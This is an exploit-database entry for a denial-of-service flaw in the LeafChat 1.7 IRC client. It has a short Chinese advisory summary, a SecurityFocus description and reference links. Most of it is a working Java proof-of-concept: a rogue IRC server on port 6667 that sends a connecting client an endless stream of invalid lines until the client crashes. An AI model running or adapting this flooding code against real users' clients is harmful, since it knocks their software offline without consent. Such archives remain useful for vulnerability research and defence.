https://www.exploit-db.com/exploits/20039
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200006-099

LeafChat1.7版本IRC客户端存在漏洞。远程IRC服务器通过迅速发送大量错误信息导致拒绝服务。

source: http://www.securityfocus.com/bid/1396/info

If invalid data is sent repeatedly from a IRC server to a LeafDigital LeafChat IRC client, the program will stop responding. Restarting the application will be required in order to regain normal functionality. 

/* The MDMA Crew's Proof-of-concept code for the DoS affecting LeafChat
 *
 * When the LeafChat IRC client recieves invalid data from the server, it
 * displays a dialog box with an error message. Should the server rapidly
 * send invalid messages, the system soon becomes dangerously low in
 * resources and commits harikiri. :-)
 *
 * Vendor Info: www.leafdigital.com/Software/leafChat
 * Crew Info: www.mdma.za.net || [email protected]
 */

import java.io.*;
import java.net.*;

class leafMeAlone {

// Line below will have to be changed for Microsoft's Java VM - oops ;P
static void main(String[] args) throws IOException, UnknownHostException {

    ServerSocket shervshoq = null;
    PrintWriter white = null;
    Socket shmoeshoq = null;

    shervshoq = new ServerSocket(6667);
    System.out.print("Now listening on Port 6667... ");

    try {
      shmoeshoq = shervshoq.accept();
      white = new PrintWriter(shmoeshoq.getOutputStream(), true);
    } catch (IOException e) {
      System.out.println("Errors accepting connection, y0");
      System.exit(1); }

    System.out.print("Connection recievednCrashing client... ");
    for (;;) {
      white.println(".");
      if (white.checkError()) {
      System.out.println("Crashed");
      break; } } } }

来源:BUGTRAQ
名称:20000625LeafChatDenialofService
链接:http://www.securityfocus.com/templates/archive.pike?list=1&msg;[email protected]
来源:www.leafdigital.com
链接:http://www.leafdigital.com/Software/leafChat/history.html
来源:BID
名称:1396
链接:http://www.securityfocus.com/bid/1396